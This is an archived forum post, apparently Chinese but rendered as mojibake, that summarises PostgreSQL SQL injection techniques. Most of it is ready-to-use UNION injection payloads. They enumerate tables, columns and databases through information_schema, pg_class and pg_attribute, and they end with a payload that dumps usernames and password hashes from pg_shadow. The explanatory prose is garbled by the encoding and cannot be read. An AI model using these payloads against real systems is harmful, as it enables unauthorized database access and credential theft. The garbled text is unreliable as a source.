postgreSQL×¢Èë×Ü½á

admin ·¢±íÓÚ 2013-10-13 12:57:16

½áºÏÁËMSSQL MySQL OracleµÄÒ»Ð©ÌØµã
Ö§³Ö¶àÓï¾äÖ´ÐÐ£¬Óï¾ä¿ÉÒÔÃ»ÓÐfrompostgresÓÃ»§ÊÇ³¬¼¶ÓÃ»§(´´Ê¼ÈËÕË»§) Ö»ÓÐsuperuserÓÐcopyÈ¨ÏÞ×¢ÊÍ: ¡ª , /**/
Á¬½Ó·û: %20 , + , /**/ÄÚÖÃº¯Êý:
current_database() //µ±Ç°Êý¾Ý¿âÃû
session_user //»á»°ÓÃ»§
current_user //µ±Ç°Êý¾Ý¿âÓÃ»§
user //µ±Ç°ÓÃ»§
version() //Êý¾Ý¿â°æ±¾Union×¢Éä:
order by n¨C
and 1=2 union select null,null,null¨C
and 1=2 union select ¡®beach¡¯,null,null¨C
and 1=2 union select (select version()),null,null¨C»ñÈ¡±íÃû,×Ö¶ÎÃû(ÐÂ°æ±¾ÀûÓÃinformation_schema):
group_concat(table_name)
and 1=2 union select table_name,null,null from information_schema.tables limit 1 offset n¨C
and 1=2 union select column_name,null,null from information_schema.columns where table_name=¡¯admin¡¯ limit 1 offset n¨C
(ÀÏ°æ±¾)
pg_class.oid¶ÔÓ¦pg_attribute.attrelid
pg_class.relname±íÃû
pg_attribute.attname×Ö¶ÎÃûselect relname from pg_class»ñÈ¡±íÃû
select oid from pg_class where Ìõ¼þ »ñÈ¡²ÎÊý
select attname from pg_attribute where attrelid=¡¯oidµÄÖµ¡¯ »ñÈ¡×Ö¶ÎÃûÊµÕ½:
and 1=2 union select relname,null,null from pg_class where relkind=¡¯r¡¯ limit 1 offset 0¨C¼ÓÈërelkind=¡¯r'Ö»²éÑ¯ÆÕÍ¨±í
and 1=2 union select cast(oid as varchar(10)),null,null from pg_class where relkind=¡¯r¡¯ limit 1 offset 0¨C
ÓÉÓÚoidÀàÐÍÊÇoid,ÒªÊý¾ÝÀàÐÍ¼æÈÝÎÒÃÇÓÃcastº¯ÊýÇ¿ÖÆ×ª»»³ÉvarcharÀàÐÍ¡£±ÈÈçµÃµ½1136and 1=2 union select attname,null,null from pg_attribute where attrelid=1136 limit 1 offset 0¨C±¬±íÃû
======================================================================
and 1=2 union select datname,null,null from pg_database limit 1 offset 0¨C±¬¿â
and 1=2 union select username||chr(124)||passwd,null,null from pg_shadow limit 1 offset 0¨C±¬Êý¾Ý¿âÓÃ»§ÃÜÂë

Ò³: [1]

ÖÐ¹úÍøÂçÉøÍ¸²âÊÔÁªÃË's Archiver

postgreSQL×¢Èë×Ü½á